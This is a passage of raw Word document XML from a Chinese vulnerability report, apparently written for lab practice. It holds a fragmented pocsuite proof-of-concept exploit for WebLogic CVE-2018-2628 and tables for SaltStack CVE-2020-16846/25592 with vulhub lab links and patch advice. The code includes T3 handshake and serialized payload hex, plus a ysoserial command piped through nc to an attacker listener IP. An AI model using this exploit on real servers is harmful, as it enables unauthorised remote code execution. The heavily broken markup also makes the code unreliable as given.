          <w:rFonts w:hint="eastAsia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360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success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%3b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vul_url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/run'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 构造完整的URL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requests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vul_url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verify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allow_redirects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timeout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 使用requests库发送POST请求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status_code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'success'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 修改判断条件为响应状态码和响应内容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'VerifyInfo'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 = http_packet(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'VerifyInfo'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'URL'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vul_url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'VerifyInfo'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port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parse_output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parse_output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Output(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.success(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.fail(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'Failed'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output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register(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TestPOC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  <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2018-2628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pocsuite.api.poc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Output, POCBase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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>socket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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>time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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>binascii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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Weblogic_CVE_2018_2628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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>POCBase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vulID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'CVE-2018-2628'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'1.0'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author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'YourName'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vulDate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'2018-XX-XX'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createDate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'2023-XX-XX'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updateDate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'2023-XX-XX'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references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[]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'WebLogic CVE-2018-2628'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appPowerLink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'https://www.oracle.com/middleware/weblogic/index.html'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appName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'Oracle WebLogic Server'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appVersion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'10.3.6.0'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vulType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'RCE'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desc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'''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    WebLogic Server WLS Security组件反序列化远程代码执行漏洞（CVE-2018-2628）是一种远程代码执行漏洞，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    可通过特定T3协议请求导致代码执行。此POC用于检测漏洞是否存在，并触发远程代码执行。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    '''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_verify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.url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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 在这里实现检测漏洞的代码逻辑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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 你可以使用 requests 发送特定的 T3 协议请求，并检查响应是否有远程代码执行的标识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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>socket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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>socket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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>socket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AF_INET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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>socket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SOCK_STREAM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settimeout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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>65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server_addr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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>7001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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># WebLogic默认端口为7001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connect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server_addr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'74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'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.decode(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'hex'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F1F1F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sleep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recv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F1F1F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target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F1F1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_attack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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 在这里实现利用漏洞的逻辑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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 你可以使用提供的参数执行攻击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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 例如: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victim_ip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.url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victim_port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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>7001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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 需要根据实际环境调整端口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ysoserial_path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"ysoserial.jar"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jrmp_listener_ip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"JRMPListener_IP"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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>## 攻击 ip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jrmp_listener_port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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>1099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jrmp_client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"JRMPClient"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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>## kali ip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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 利用提供的参数来攻击漏洞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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>socket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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>socket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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>socket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AF_INET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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>socket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SOCK_STREAM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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 创建一个套接字并设置超时时间为65秒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settimeout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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>65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server_addr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victim_ip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victim_port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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 设置服务端地址为受害者的IP和端口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t3_handshake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server_addr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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 进行 T3 协议握手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t3_request_data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victim_port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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 构建 T3 请求数据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payload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generate_payload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ysoserial_path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jrmp_listener_ip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jrmp_listener_port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jrmp_client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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 这里进行生成payload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send_payload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payload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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 调用方法请求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'response: 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t3_handshake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server_addr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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 用于T3协议进行握手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.connect(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server_addr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.send(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'74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'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.decode(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'hex'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F1F1F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sleep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.recv(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F1F1F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'handshake successful'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t3_request_data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'000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372'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'001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e675061746368'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'49000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372'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'001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67'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        ]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.send(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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>binascii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unhexlify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F1F1F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sleep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 xml:space="preserve">'send request payload successful, recv length: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.recv(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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>2048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))))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send_payload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payload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056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000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{0}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ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'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{:04x}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payload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data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payload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fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'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payload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%s%s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{:08x}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payload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payload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.send(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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>binascii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unhexlify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payload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F1F1F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sleep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.send(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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>binascii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unhexlify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payload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''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.recv(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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>4096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).decode(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'utf-8'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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 将响应结果解码成字符串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F1F1F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sleep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F1F1F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F1F1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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>pass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res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generate_payload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ysoserial_path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jrmp_listener_ip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jrmp_listener_port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jrmp_client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command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"touch /tmp/test"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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 命令执行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payload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 xml:space="preserve">"java -jar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ysoserial_path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jrmp_client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5"/>
          <w:szCs w:val="15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command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5"/>
          <w:szCs w:val="15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 xml:space="preserve"> | nc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jrmp_listener_ip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jrmp_listener_port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eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN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payload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parse_output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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t># 输出结果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Output(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.success(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.fail(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'Exploit failed'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__name__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'__main__'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weblogic_poc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F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Weblogic_CVE_2018_2628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weblogic_poc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.url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'http://127.0.0.1'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weblogic_poc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_verify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1F1F1F"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>## 做一个判断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 xml:space="preserve">'目标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 xml:space="preserve"> 存在漏洞'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0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 xml:space="preserve">'目标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 xml:space="preserve"> 不存在漏洞'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)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc25120"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.2 漏洞信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="14"/>
        <w:tblW w:w="9342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"/>
        <w:gridCol w:w="1304"/>
        <w:gridCol w:w="113"/>
        <w:gridCol w:w="1446"/>
        <w:gridCol w:w="113"/>
        <w:gridCol w:w="1531"/>
        <w:gridCol w:w="113"/>
        <w:gridCol w:w="1187"/>
        <w:gridCol w:w="113"/>
        <w:gridCol w:w="1627"/>
        <w:gridCol w:w="113"/>
        <w:gridCol w:w="1456"/>
        <w:gridCol w:w="11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3" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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pStyle w:val="20"/>
              <w:spacing w:line="480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hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>UVD-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="155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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644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EBEBE" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480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漏洞类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="130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命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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EBEBE" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480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CVE-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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  <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CVE-2020-16846CVE-2020-25592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3" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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pStyle w:val="20"/>
              <w:spacing w:line="480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hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>披露/发现时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="155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2020/8/4 0:00:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644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EBEBE" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480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bugtraq编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="130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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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EBEBE" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480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CNNVD-ID：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roma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3" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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pStyle w:val="20"/>
              <w:spacing w:line="480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hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>提交时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="155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2023/7/20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644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EBEBE" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480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漏洞发现者</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="130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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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EBEBE" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480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CNVD-ID：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roma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3" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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pStyle w:val="20"/>
              <w:spacing w:line="480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hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>漏洞等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="155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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644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EBEBE" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480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提交者</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="130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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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EBEBE" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480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搜索关键词</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roma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3" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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pStyle w:val="20"/>
              <w:spacing w:line="480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hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>影响范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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SaltStack &lt; 3002.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="20"/>
              <w:spacing w:line="480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SaltStack &lt; 3001.3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="20"/>
              <w:spacing w:line="480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SaltStack &lt; 3000.5</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="20"/>
              <w:spacing w:line="480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SaltStack &lt; 2019.2.7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3" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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pStyle w:val="20"/>
              <w:spacing w:line="480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hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>来源</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-16846/README.zh-cn.md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3" w:type="dxa"/>
          <w:trHeight w:val="412" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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pStyle w:val="20"/>
              <w:spacing w:line="480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hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>漏洞简介</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。2020年11月SaltStack官方披露了CVE-2020-16846和CVE-2020-25592两个漏洞，其中CVE-2020-25592允许任意用户调用SSH模块，CVE-2020-16846允许用户执行任意命令。组合这两个漏洞，将可以使未授权的攻击者通过Salt API执行任意命令。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3" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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pStyle w:val="20"/>
              <w:spacing w:line="480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hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>漏洞详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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CVE-2020-16846: 命令注入漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="20"/>
              <w:spacing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未经过身份验证的攻击者通过发送特制请求包，可通过 Salt API 注入 ssh 连接命令，导致命令执行。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="20"/>
              <w:spacing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CVE-2020-25592: 验证绕过漏洞</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="20"/>
              <w:spacing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Salt 在验证 eauth 凭据和访问控制列表 ACL 时存在一处验证绕过漏洞。未经过身份验证的远程攻击者通过发送特制的请求包，可以通过 salt-api 绕过身份验证，并使用 salt ssh 连接目标服务器。结合 CVE-2020-16846 可能造成命令执行。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3" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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pStyle w:val="20"/>
              <w:spacing w:line="480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hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>参考链接</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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https://mp.weixin.qq.com/s/r95I--ddozbl9VpiV_phGQ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3" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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spacing w:line="480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靶场信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>https://vulhub.org/#/environments/saltstack/CVE-2020-16846/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3" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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spacing w:line="480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POC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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48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如前文所示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3" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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spacing w:line="480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修复方案</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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480" w:lineRule="auto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缓解措施:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="240" w:firstLineChars="100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建议从官方下载对应版本的修复补丁，SaltStack修复补丁下载地址：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="240" w:firstLineChars="100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https://gitlab.com/saltstack/open/salt-patches</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="295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若暂时无法打上补丁，在业务允许的情况下，通过限制系统访问ip，降低风险。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto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修复建议:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="295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建议从官方下载最新的软件版本，SaltStack新版下载地址：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="295"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              </w:rPr>
              <w:t>https://repo.saltstack.com/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3" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="153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pStyle w:val="20"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="482"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>UVD-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="155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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644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EBEBE" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480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漏洞类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="130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代码执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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EBEBE" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480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CVE-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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ind w:firstLine="3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CVE-2018-2628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3" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="153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pStyle w:val="20"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="482"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>披露/发现时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="155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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="444444"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>2018-04-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644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EBEBE" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480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bugtraq编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="130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rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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EBEBE" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480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CNNVD-ID：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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CNNVD-201804-803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3" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="153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pStyle w:val="20"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="482"/>
              <w:rPr>
